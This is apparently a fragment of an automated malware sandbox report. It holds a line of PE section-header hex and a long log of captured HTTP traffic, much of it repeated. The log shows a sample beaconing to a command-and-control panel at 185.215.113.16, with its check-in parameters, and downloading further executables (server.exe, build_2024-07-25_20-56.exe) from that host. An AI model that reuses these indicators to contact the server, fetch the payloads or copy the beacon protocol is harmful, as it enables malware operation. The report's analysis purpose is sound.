00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 9c 7f 07 00 00 90 9a 00 00 80 07 00 00 2c 98 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 70 64 61 74 61 00 00 9c c9 06 00 00 10 a2 00 00 ca 06 00 00 ac 9f 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: GET /inc/server.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000019001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/build_2024-07-25_20-56.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000020001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
